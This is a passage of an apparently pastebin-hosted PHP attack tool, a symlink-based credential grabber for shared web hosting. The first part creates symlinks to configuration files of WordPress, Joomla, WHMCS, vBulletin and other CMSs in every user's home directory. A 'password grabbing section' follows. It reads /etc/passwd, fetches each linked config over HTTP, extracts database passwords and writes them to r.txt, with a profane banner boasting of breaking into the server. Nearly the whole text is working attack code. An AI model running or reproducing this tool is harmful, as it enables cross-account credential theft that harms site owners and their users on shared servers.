  717. symlink('/home/'.$us.'/site/wp-config.php',$r.$us.'..WordPress');
  718. symlink('/home/'.$us.'/config.php',$r.$us.'..PhpBB');
  719. symlink('/home/'.$us.'/includes/config.php',$r.$us.'..vBulletin');
  720. symlink('/home/'.$us.'/configuration.php',$r.$us.'..Joomla');
  721. symlink('/home/'.$us.'/web/configuration.php',$r.$us.'..Joomla');
  722. symlink('/home/'.$us.'/joomla/configuration.php',$r.$us.'..Joomla');
  723. symlink('/home/'.$us.'/site/configuration.php',$r.$us.'..Joomla');
  724. symlink('/home/'.$us.'/conf_global.php',$r.$us.'..IPB');
  725. symlink('/home/'.$us.'/Settings.php',$r.$us.'..SMF');
  726. symlink('/home/'.$us.'/e107_config.php',$r.$us.'..e107');
  727. symlink('/home/'.$us.'/datas/config.php',$r.$us.'..Seditio');
  728. symlink('/home/'.$us.'/includes/configure.php',$r.$us.'..osCommerce');
  729. symlink('/home/'.$us.'/client/configuration.php',$r.$us.'..WHMCS');
  730. symlink('/home/'.$us.'/support/configuration.php',$r.$us.'..WHMCS');
  731. symlink('/home/'.$us.'/supportes/configuration.php',$r.$us.'..WHMCS');
  732. symlink('/home/'.$us.'/domain/configuration.php',$r.$us.'..WHMCS');
  733. symlink('/home/'.$us.'/hosting/configuration.php',$r.$us.'..WHMCS');
  734. symlink('/home/'.$us.'/billing/configuration.php',$r.$us.'..WHMCS');
  735. symlink('/home/'.$us.'/portal/configuration.php',$r.$us.'..WHMCS');
  736. symlink('/home/'.$us.'/order/configuration.php',$r.$us.'..WHMCS');
  737. symlink('/home/'.$us.'/clientarea/configuration.php',$r.$us.'..WHMCS');
  738. symlink('/home/'.$us.'/domains/configuration.php',$r.$us.'..WHMCS');
  739. symlink('/home1/'.$us.'/include/configure.php',$r.$us.'..Unknown');
  740. symlink('/home1/'.$us.'/public_html/include/configure.php',$r.$us.'..Unknown');
  741. symlink('/home1/'.$us.'/include/config.php',$r.$us.'..Unknown');
  742. symlink('/home1/'.$us.'/public_html/include/config.php',$r.$us.'..Unknown');
  743. symlink('/home1/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');
  744. symlink('/home1/'.$us.'/public_html/wordpress/wp-config.php',$r.$us.'..word-wp');
  745. symlink('/home1/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wpblog');
  746. symlink('/home1/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');
  747. symlink('/home1/'.$us.'/public_html/joomla/configuration.php',$r.$us.'..joomla');
  748. symlink('/home1/'.$us.'/public_html/vb/includes/config.php',$r.$us.'..vbinc');
  749. symlink('/home1/'.$us.'/public_html/includes/config.php',$r.$us.'..vb');
  750. symlink('/home1/'.$us.'/public_html/conf_global.php',$r.$us.'..conf_global');
  751. symlink('/home1/'.$us.'/public_html/inc/config.php',$r.$us.'..inc');
  752. symlink('/home1/'.$us.'/public_html/config.php',$r.$us.'..config');
  753. symlink('/home1/'.$us.'/public_html/Settings.php',$r.$us.'..Settings');
  754. symlink('/home1/'.$us.'/public_html/sites/default/settings.php',$r.$us.'..sites');
  755. symlink('/home1/'.$us.'/public_html/whm/configuration.php',$r.$us.'..whm');
  756. symlink('/home1/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs');
  757. symlink('/home1/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs');
  758. symlink('/home1/'.$us.'/public_html/whmc/WHM/configuration.php',$r.$us.'..WHM');
  759. symlink('/home1/'.$us.'/public_html/whm/WHMCS/configuration.php',$r.$us.'..whmc');
  760. symlink('/home1/'.$us.'/public_html/whm/whmcs/configuration.php',$r.$us.'..WHMcs');
  761. symlink('/home1/'.$us.'/public_html/support/configuration.php',$r.$us.'..whmcsupp');
  762. symlink('/home1/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-cli');
  763. symlink('/home1/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-cl');
  764. symlink('/home1/'.$us.'/public_html/clientes/configuration.php',$r.$us.'..whmcs-CL');
  765. symlink('/home1/'.$us.'/public_html/cliente/configuration.php',$r.$us.'..whmcs-Cl');
  766. symlink('/home1/'.$us.'/public_html/clientsupport/configuration.php',$r.$us.'..whmcs-csup');
  767. symlink('/home1/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-bill');
  768. symlink('/home1/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-conf');
  769. symlink('/home1/'.$us.'/wp-config.php',$r.$us.'..WordPress');
  770. symlink('/home1/'.$us.'/blog/wp-config.php',$r.$us.'..WordPress');
  771. symlink('/home1/'.$us.'/wp/wp-config.php',$r.$us.'..WordPress');
  772. symlink('/home1/'.$us.'/site/wp-config.php',$r.$us.'..WordPress');
  773. symlink('/home1/'.$us.'/config.php',$r.$us.'..PhpBB');
  774. symlink('/home1/'.$us.'/includes/config.php',$r.$us.'..vBulletin');
  775. symlink('/home1/'.$us.'/configuration.php',$r.$us.'..Joomla');
  776. symlink('/home1/'.$us.'/web/configuration.php',$r.$us.'..Joomla');
  777. symlink('/home1/'.$us.'/joomla/configuration.php',$r.$us.'..Joomla');
  778. symlink('/home1/'.$us.'/site/configuration.php',$r.$us.'..Joomla');
  779. symlink('/home1/'.$us.'/conf_global.php',$r.$us.'..IPB');
  780. symlink('/home1/'.$us.'/Settings.php',$r.$us.'..SMF');
  781. symlink('/home1/'.$us.'/e107_config.php',$r.$us.'..e107');
  782. symlink('/home1/'.$us.'/datas/config.php',$r.$us.'..Seditio');
  783. symlink('/home1/'.$us.'/includes/configure.php',$r.$us.'..osCommerce');
  784. symlink('/home1/'.$us.'/client/configuration.php',$r.$us.'..WHMCS');
  785. symlink('/home1/'.$us.'/support/configuration.php',$r.$us.'..WHMCS');
  786. symlink('/home1/'.$us.'/supportes/configuration.php',$r.$us.'..WHMCS');
  787. symlink('/home1/'.$us.'/domain/configuration.php',$r.$us.'..WHMCS');
  788. symlink('/home1/'.$us.'/hosting/configuration.php',$r.$us.'..WHMCS');
  789. symlink('/home1/'.$us.'/billing/configuration.php',$r.$us.'..WHMCS');
  790. symlink('/home1/'.$us.'/portal/configuration.php',$r.$us.'..WHMCS');
  791. symlink('/home1/'.$us.'/order/configuration.php',$r.$us.'..WHMCS');
  792. symlink('/home1/'.$us.'/clientarea/configuration.php',$r.$us.'..WHMCS');
  793. symlink('/home1/'.$us.'/domains/configuration.php',$r.$us.'..WHMCS');
  794. symlink('/home2/'.$us.'/include/configure.php',$r.$us.'..Unknown');
  795. symlink('/home2/'.$us.'/public_html/include/configure.php',$r.$us.'..Unknown');
  796. symlink('/home2/'.$us.'/include/config.php',$r.$us.'..Unknown');
  797. symlink('/home2/'.$us.'/public_html/include/config.php',$r.$us.'..Unknown');
  798. symlink('/home2/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');
  799. symlink('/home2/'.$us.'/public_html/wordpress/wp-config.php',$r.$us.'..word-wp');
  800. symlink('/home2/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wpblog');
  801. symlink('/home2/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');
  802. symlink('/home2/'.$us.'/public_html/joomla/configuration.php',$r.$us.'..joomla');
  803. symlink('/home2/'.$us.'/public_html/vb/includes/config.php',$r.$us.'..vbinc');
  804. symlink('/home2/'.$us.'/public_html/includes/config.php',$r.$us.'..vb');
  805. symlink('/home2/'.$us.'/public_html/conf_global.php',$r.$us.'..conf_global');
  806. symlink('/home2/'.$us.'/public_html/inc/config.php',$r.$us.'..inc');
  807. symlink('/home2/'.$us.'/public_html/config.php',$r.$us.'..config');
  808. symlink('/home2/'.$us.'/public_html/Settings.php',$r.$us.'..Settings');
  809. symlink('/home2/'.$us.'/public_html/sites/default/settings.php',$r.$us.'..sites');
  810. symlink('/home2/'.$us.'/public_html/whm/configuration.php',$r.$us.'..whm');
  811. symlink('/home2/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs');
  812. symlink('/home2/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs');
  813. symlink('/home2/'.$us.'/public_html/whmc/WHM/configuration.php',$r.$us.'..WHM');
  814. symlink('/home2/'.$us.'/public_html/whm/WHMCS/configuration.php',$r.$us.'..whmc');
  815. symlink('/home2/'.$us.'/public_html/whm/whmcs/configuration.php',$r.$us.'..WHMcs');
  816. symlink('/home2/'.$us.'/public_html/support/configuration.php',$r.$us.'..whmcsupp');
  817. symlink('/home2/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-cli');
  818. symlink('/home2/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-cl');
  819. symlink('/home2/'.$us.'/public_html/clientes/configuration.php',$r.$us.'..whmcs-CL');
  820. symlink('/home2/'.$us.'/public_html/cliente/configuration.php',$r.$us.'..whmcs-Cl');
  821. symlink('/home2/'.$us.'/public_html/clientsupport/configuration.php',$r.$us.'..whmcs-csup');
  822. symlink('/home2/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-bill');
  823. symlink('/home2/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-conf');
  824. symlink('/home2/'.$us.'/wp-config.php',$r.$us.'..WordPress');
  825. symlink('/home2/'.$us.'/blog/wp-config.php',$r.$us.'..WordPress');
  826. symlink('/home2/'.$us.'/wp/wp-config.php',$r.$us.'..WordPress');
  827. symlink('/home2/'.$us.'/site/wp-config.php',$r.$us.'..WordPress');
  828. symlink('/home2/'.$us.'/config.php',$r.$us.'..PhpBB');
  829. symlink('/home2/'.$us.'/includes/config.php',$r.$us.'..vBulletin');
  830. symlink('/home2/'.$us.'/configuration.php',$r.$us.'..Joomla');
  831. symlink('/home2/'.$us.'/web/configuration.php',$r.$us.'..Joomla');
  832. symlink('/home2/'.$us.'/joomla/configuration.php',$r.$us.'..Joomla');
  833. symlink('/home2/'.$us.'/site/configuration.php',$r.$us.'..Joomla');
  834. symlink('/home2/'.$us.'/conf_global.php',$r.$us.'..IPB');
  835. symlink('/home2/'.$us.'/Settings.php',$r.$us.'..SMF');
  836. symlink('/home2/'.$us.'/e107_config.php',$r.$us.'..e107');
  837. symlink('/home2/'.$us.'/datas/config.php',$r.$us.'..Seditio');
  838. symlink('/home2/'.$us.'/includes/configure.php',$r.$us.'..osCommerce');
  839. symlink('/home2/'.$us.'/client/configuration.php',$r.$us.'..WHMCS');
  840. symlink('/home2/'.$us.'/support/configuration.php',$r.$us.'..WHMCS');
  841. symlink('/home2/'.$us.'/supportes/configuration.php',$r.$us.'..WHMCS');
  842. symlink('/home2/'.$us.'/domain/configuration.php',$r.$us.'..WHMCS');
  843. symlink('/home2/'.$us.'/hosting/configuration.php',$r.$us.'..WHMCS');
  844. symlink('/home2/'.$us.'/billing/configuration.php',$r.$us.'..WHMCS');
  845. symlink('/home2/'.$us.'/portal/configuration.php',$r.$us.'..WHMCS');
  846. symlink('/home2/'.$us.'/order/configuration.php',$r.$us.'..WHMCS');
  847. symlink('/home2/'.$us.'/clientarea/configuration.php',$r.$us.'..WHMCS');
  848. symlink('/home2/'.$us.'/domains/configuration.php',$r.$us.'..WHMCS');
  849. symlink('/home3/'.$us.'/include/configure.php',$r.$us.'..Unknown');
  850. symlink('/home3/'.$us.'/public_html/include/configure.php',$r.$us.'..Unknown');
  851. symlink('/home3/'.$us.'/include/config.php',$r.$us.'..Unknown');
  852. symlink('/home3/'.$us.'/public_html/include/config.php',$r.$us.'..Unknown');
  853. symlink('/home3/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');
  854. symlink('/home3/'.$us.'/public_html/wordpress/wp-config.php',$r.$us.'..word-wp');
  855. symlink('/home3/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wpblog');
  856. symlink('/home3/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');
  857. symlink('/home3/'.$us.'/public_html/joomla/configuration.php',$r.$us.'..joomla');
  858. symlink('/home3/'.$us.'/public_html/vb/includes/config.php',$r.$us.'..vbinc');
  859. symlink('/home3/'.$us.'/public_html/includes/config.php',$r.$us.'..vb');
  860. symlink('/home3/'.$us.'/public_html/conf_global.php',$r.$us.'..conf_global');
  861. symlink('/home3/'.$us.'/public_html/inc/config.php',$r.$us.'..inc');
  862. symlink('/home3/'.$us.'/public_html/config.php',$r.$us.'..config');
  863. symlink('/home3/'.$us.'/public_html/Settings.php',$r.$us.'..Settings');
  864. symlink('/home3/'.$us.'/public_html/sites/default/settings.php',$r.$us.'..sites');
  865. symlink('/home3/'.$us.'/public_html/whm/configuration.php',$r.$us.'..whm');
  866. symlink('/home3/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs');
  867. symlink('/home3/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs');
  868. symlink('/home3/'.$us.'/public_html/whmc/WHM/configuration.php',$r.$us.'..WHM');
  869. symlink('/home3/'.$us.'/public_html/whm/WHMCS/configuration.php',$r.$us.'..whmc');
  870. symlink('/home3/'.$us.'/public_html/whm/whmcs/configuration.php',$r.$us.'..WHMcs');
  871. symlink('/home3/'.$us.'/public_html/support/configuration.php',$r.$us.'..whmcsupp');
  872. symlink('/home3/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-cli');
  873. symlink('/home3/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-cl');
  874. symlink('/home3/'.$us.'/public_html/clientes/configuration.php',$r.$us.'..whmcs-CL');
  875. symlink('/home3/'.$us.'/public_html/cliente/configuration.php',$r.$us.'..whmcs-Cl');
  876. symlink('/home3/'.$us.'/public_html/clientsupport/configuration.php',$r.$us.'..whmcs-csup');
  877. symlink('/home3/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-bill');
  878. symlink('/home3/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-conf');
  879. symlink('/home3/'.$us.'/wp-config.php',$r.$us.'..WordPress');
  880. symlink('/home3/'.$us.'/blog/wp-config.php',$r.$us.'..WordPress');
  881. symlink('/home3/'.$us.'/wp/wp-config.php',$r.$us.'..WordPress');
  882. symlink('/home3/'.$us.'/site/wp-config.php',$r.$us.'..WordPress');
  883. symlink('/home3/'.$us.'/config.php',$r.$us.'..PhpBB');
  884. symlink('/home3/'.$us.'/includes/config.php',$r.$us.'..vBulletin');
  885. symlink('/home3/'.$us.'/configuration.php',$r.$us.'..Joomla');
  886. symlink('/home3/'.$us.'/web/configuration.php',$r.$us.'..Joomla');
  887. symlink('/home3/'.$us.'/joomla/configuration.php',$r.$us.'..Joomla');
  888. symlink('/home3/'.$us.'/site/configuration.php',$r.$us.'..Joomla');
  889. symlink('/home3/'.$us.'/conf_global.php',$r.$us.'..IPB');
  890. symlink('/home3/'.$us.'/Settings.php',$r.$us.'..SMF');
  891. symlink('/home3/'.$us.'/e107_config.php',$r.$us.'..e107');
  892. symlink('/home3/'.$us.'/datas/config.php',$r.$us.'..Seditio');
  893. symlink('/home3/'.$us.'/includes/configure.php',$r.$us.'..osCommerce');
  894. symlink('/home3/'.$us.'/client/configuration.php',$r.$us.'..WHMCS');
  895. symlink('/home3/'.$us.'/support/configuration.php',$r.$us.'..WHMCS');
  896. symlink('/home3/'.$us.'/supportes/configuration.php',$r.$us.'..WHMCS');
  897. symlink('/home3/'.$us.'/domain/configuration.php',$r.$us.'..WHMCS');
  898. symlink('/home3/'.$us.'/hosting/configuration.php',$r.$us.'..WHMCS');
  899. symlink('/home3/'.$us.'/billing/configuration.php',$r.$us.'..WHMCS');
  900. symlink('/home3/'.$us.'/portal/configuration.php',$r.$us.'..WHMCS');
  901. symlink('/home3/'.$us.'/order/configuration.php',$r.$us.'..WHMCS');
  902. symlink('/home3/'.$us.'/clientarea/configuration.php',$r.$us.'..WHMCS');
  903. symlink('/home3/'.$us.'/domains/configuration.php',$r.$us.'..WHMCS');
  904. symlink('/home4/'.$us.'/include/configure.php',$r.$us.'..Unknown');
  905. symlink('/home4/'.$us.'/public_html/include/configure.php',$r.$us.'..Unknown');
  906. symlink('/home4/'.$us.'/include/config.php',$r.$us.'..Unknown');
  907. symlink('/home4/'.$us.'/public_html/include/config.php',$r.$us.'..Unknown');
  908. symlink('/home4/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');
  909. symlink('/home4/'.$us.'/public_html/wordpress/wp-config.php',$r.$us.'..word-wp');
  910. symlink('/home4/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wpblog');
  911. symlink('/home4/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');
  912. symlink('/home4/'.$us.'/public_html/joomla/configuration.php',$r.$us.'..joomla');
  913. symlink('/home4/'.$us.'/public_html/vb/includes/config.php',$r.$us.'..vbinc');
  914. symlink('/home4/'.$us.'/public_html/includes/config.php',$r.$us.'..vb');
  915. symlink('/home4/'.$us.'/public_html/conf_global.php',$r.$us.'..conf_global');
  916. symlink('/home4/'.$us.'/public_html/inc/config.php',$r.$us.'..inc');
  917. symlink('/home4/'.$us.'/public_html/config.php',$r.$us.'..config');
  918. symlink('/home4/'.$us.'/public_html/Settings.php',$r.$us.'..Settings');
  919. symlink('/home4/'.$us.'/public_html/sites/default/settings.php',$r.$us.'..sites');
  920. symlink('/home4/'.$us.'/public_html/whm/configuration.php',$r.$us.'..whm');
  921. symlink('/home4/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs');
  922. symlink('/home4/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs');
  923. symlink('/home4/'.$us.'/public_html/whmc/WHM/configuration.php',$r.$us.'..WHM');
  924. symlink('/home4/'.$us.'/public_html/whm/WHMCS/configuration.php',$r.$us.'..whmc');
  925. symlink('/home4/'.$us.'/public_html/whm/whmcs/configuration.php',$r.$us.'..WHMcs');
  926. symlink('/home4/'.$us.'/public_html/support/configuration.php',$r.$us.'..whmcsupp');
  927. symlink('/home4/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-cli');
  928. symlink('/home4/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-cl');
  929. symlink('/home4/'.$us.'/public_html/clientes/configuration.php',$r.$us.'..whmcs-CL');
  930. symlink('/home4/'.$us.'/public_html/cliente/configuration.php',$r.$us.'..whmcs-Cl');
  931. symlink('/home4/'.$us.'/public_html/clientsupport/configuration.php',$r.$us.'..whmcs-csup');
  932. symlink('/home4/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-bill');
  933. symlink('/home4/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-conf');
  934. symlink('/home4/'.$us.'/wp-config.php',$r.$us.'..WordPress');
  935. symlink('/home4/'.$us.'/blog/wp-config.php',$r.$us.'..WordPress');
  936. symlink('/home4/'.$us.'/wp/wp-config.php',$r.$us.'..WordPress');
  937. symlink('/home4/'.$us.'/site/wp-config.php',$r.$us.'..WordPress');
  938. symlink('/home4/'.$us.'/config.php',$r.$us.'..PhpBB');
  939. symlink('/home4/'.$us.'/includes/config.php',$r.$us.'..vBulletin');
  940. symlink('/home4/'.$us.'/configuration.php',$r.$us.'..Joomla');
  941. symlink('/home4/'.$us.'/web/configuration.php',$r.$us.'..Joomla');
  942. symlink('/home4/'.$us.'/joomla/configuration.php',$r.$us.'..Joomla');
  943. symlink('/home4/'.$us.'/site/configuration.php',$r.$us.'..Joomla');
  944. symlink('/home4/'.$us.'/conf_global.php',$r.$us.'..IPB');
  945. symlink('/home4/'.$us.'/Settings.php',$r.$us.'..SMF');
  946. symlink('/home4/'.$us.'/e107_config.php',$r.$us.'..e107');
  947. symlink('/home4/'.$us.'/datas/config.php',$r.$us.'..Seditio');
  948. symlink('/home4/'.$us.'/includes/configure.php',$r.$us.'..osCommerce');
  949. symlink('/home4/'.$us.'/client/configuration.php',$r.$us.'..WHMCS');
  950. symlink('/home4/'.$us.'/support/configuration.php',$r.$us.'..WHMCS');
  951. symlink('/home4/'.$us.'/supportes/configuration.php',$r.$us.'..WHMCS');
  952. symlink('/home4/'.$us.'/domain/configuration.php',$r.$us.'..WHMCS');
  953. symlink('/home4/'.$us.'/hosting/configuration.php',$r.$us.'..WHMCS');
  954. symlink('/home4/'.$us.'/billing/configuration.php',$r.$us.'..WHMCS');
  955. symlink('/home4/'.$us.'/portal/configuration.php',$r.$us.'..WHMCS');
  956. symlink('/home4/'.$us.'/order/configuration.php',$r.$us.'..WHMCS');
  957. symlink('/home4/'.$us.'/clientarea/configuration.php',$r.$us.'..WHMCS');
  958. symlink('/home4/'.$us.'/domains/configuration.php',$r.$us.'..WHMCS');
  959. }
  960. }
  961. ?>
  962. <?php
  963. //////////////////////////////////////
  964. /////password grabbing section////////
  965. //////////////////////////////////////
  966. ?>
  967.  
  968.  
  969.  
  970. <form method=post>
  971. <input type=submit name=sm value="start grabbing passwords from configuration files"></form>
  972. <?php
  973. error_reporting(0);
  974. set_time_limit(0);
  975. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  976. {
  977.  
  978. $ar0=explode($marqueurDebutLien, $text);
  979. $ar1=explode($marqueurFinLien, $ar0[1]);
  980. $ar=trim($ar1[0]);
  981. return $ar;
  982. }
  983.  
  984. if(isset($_POST['sm']))
  985.  
  986. {
  987. echo "Wait Or Have A Cup Of Tea.... Until I Fuck This Server And Grab The Passwords <br> The Password Will Save As [r.txt]";
  988. $ffile=fopen('r.txt','a+');
  989.  
  990.  
  991. $confi=array("..wp-config","..word-wp","..wpblog","..joomla-or-whmcs","..joomla","..vbinc","..vb","..conf_global","..inc","..config","..Settings","..sites","..whm","..whmcs","..supporwhmcs","..WHM","..whmc","..WHMcs","..whmcsupp","..whmcs-cli","..whmcs-cl","..whmcs-CL","..whmcs-Cl","..whmcs-csup","..whmcs-bill","..admin-conf","..WordPress","..PhpBB","..vBulletin","..Joomla","..IPB","..SMF","..e107","..Seditio","..osCommerce","..WHMCS");
  992. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/symlink/";
  993. $re=$r;
  994.  
  995. $users=file("/etc/passwd");
  996. foreach($users as $user)
  997. {
  998.  
  999. $str=explode(":",$user);
  1000. $usersss=$str[0];
  1001. foreach($confi as $co)
  1002. {
  1003.  
  1004.  
  1005. $uurl=$re.$usersss.$co;
  1006. $uel=$uurl;
  1007.  
  1008. $ch = curl_init();
  1009.  
  1010. curl_setopt($ch, CURLOPT_URL, $uel);
  1011. curl_setopt($ch, CURLOPT_HEADER, 1);
  1012. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1013. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1014. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  1015. $result['EXE'] = curl_exec($ch);
  1016. curl_close($ch);
  1017. $uxl=$result['EXE'];
  1018.  
  1019.  
  1020. if($uxl && preg_match('/table_prefix/i',$uxl))
  1021. {
  1022.  
  1023. echo "<center><div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss  user's website cms is wordpress </font></td></tr></table></center>";
  1024.  
  1025.  echo $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
  1026. if(!empty($dbp))
  1027. $pass=$dbp."\n";
  1028. fwrite($ffile,$pass);
  1029.  
  1030. }
  1031. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
  1032. {
  1033.  
  1034. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss  user's website whm cms XD </font></td></tr></table>";
  1035.  
  1036. echo $dbp=entre2v2($uxl,"db_password = '","';");
  1037. if(!empty($dbp))
  1038. $pass=$dbp."\n";
  1039. fwrite($ffile,$pass);
  1040.  
  1041. }
  1042.  
  1043.  
  1044. elseif($uxl && preg_match('/dbprefix/i',$uxl))
  1045. {
  1046.  
  1047. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss  user's  website cms is joomla </font></td></tr></table>";
  1048.  
  1049. echo $db=entre2v2($uxl,"password = '","';");
  1050. if(!empty($db))
  1051. $pass=$db."\n";
  1052. fwrite($ffile,$pass);
  1053. }
  1054. elseif($uxl && preg_match('/admincpdir/i',$uxl))
  1055. {
  1056.  
  1057. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss  user's website cms is vbulletin </font></td></tr></table>";
  1058.  
  1059. echo $db=entre2v2($uxl,"password'] = '","';");
  1060. if(!empty($db))
  1061. $pass=$db."\n";
  1062. fwrite($ffile,$pass);
  1063.  
  1064. }
  1065. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
  1066. {
  1067.  
  1068. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> got config file for unknwon cms for user $usersss   </font></td></tr></table>";
  1069.  
  1070. echo $db=entre2v2($uxl,"DB_PASSWORD', '","');");
  1071. if(!empty($db))
  1072. $pass=$db."\n";
  1073. fwrite($ffile,$pass);
  1074. }
  1075. elseif($uxl && preg_match('/dbpass/i',$uxl))
  1076. {
  1077.  
  1078. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
  1079.  
  1080. echo $db=entre2v2($uxl,"dbpass = '","';");
  1081. if(!empty($db))
  1082. $pass=$db."\n";
  1083. fwrite($ffile,$pass);
  1084. }
  1085. elseif($uxl && preg_match('/dbpass/i',$uxl))
  1086. {
  1087.  
  1088. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> got config file for unknwon cms of user $usersss  </font></td></tr></table>";
  1089.  
  1090. echo $db=entre2v2($uxl,"dbpass = '","';");
  1091. if(!empty($db))
  1092. $pass=$db."\n";
  1093. fwrite($ffile,$pass);
  1094.  
  1095. }
  1096. elseif($uxl && preg_match('/dbpass/i',$uxl))
  1097. {
  1098.  
  1099. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
  1100.  
  1101. echo $db=entre2v2($uxl,"dbpass = \"","\";");
  1102. if(!empty($db))
  1103. $pass=$db."\n";
  1104. fwrite($ffile,$pass);
  1105. }
  1106. elseif($uxl && preg_match('/pass/i',$uxl))
  1107. {
  1108.  
  1109. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
  1110.  
  1111. echo $db=entre2v2($uxl,"pass = \"","\";");
  1112. if(!empty($db))
  1113. $pass=$db."\n";
  1114. fwrite($ffile,$pass);
  1115. }
  1116. elseif($uxl && preg_match('/pass/i',$uxl))
  1117. {
  1118.  
  1119. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
  1120.  
  1121. echo $db=entre2v2($uxl,"pass = '","';");
  1122. if(!empty($db))
  1123. $pass=$db."\n";
  1124. fwrite($ffile,$pass);
  1125. }
  1126. elseif($uxl && preg_match('/passwd/i',$uxl))
  1127. {
  1128.  
  1129. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
  1130.  
  1131. echo $db=entre2v2($uxl,"passwd = \"","\";");
  1132. if(!empty($db))
  1133. $pass=$db."\n";
  1134. fwrite($ffile,$pass);
  1135. }
  1136. elseif($uxl && preg_match('/passwd/i',$uxl))
  1137. {
  1138.  
  1139. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
  1140.  
  1141. echo $db=entre2v2($uxl,"passwd = '","';");
  1142. if(!empty($db))
  1143. $pass=$db."\n";
  1144. fwrite($ffile,$pass);
  1145. }
  1146. elseif($uxl && preg_match('/pw/i',$uxl))
  1147. {
  1148.  
  1149. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
  1150.  
  1151. echo $db=entre2v2($uxl,"pw = \"","\";");
  1152. if(!empty($db))
  1153. $pass=$db."\n";
  1154. fwrite($ffile,$pass);
  1155. }
  1156. elseif($uxl && preg_match('/pw/i',$uxl))
  1157. {
  1158.  
  1159. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
  1160.  
  1161. echo $db=entre2v2($uxl,"pw = '","';");
  1162. if(!empty($db))
  1163. $pass=$db."\n";
  1164. fwrite($ffile,$pass);
  1165. }
  1166.  
  1167. }
  1168. }
  1169. }
  1170. ?>
  1171.  
  1172. </center>
  1173.    
  1174.    
  1175. <meta http-equiv="content-type" content="text/html; charset=UTF-8"></head><body></body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement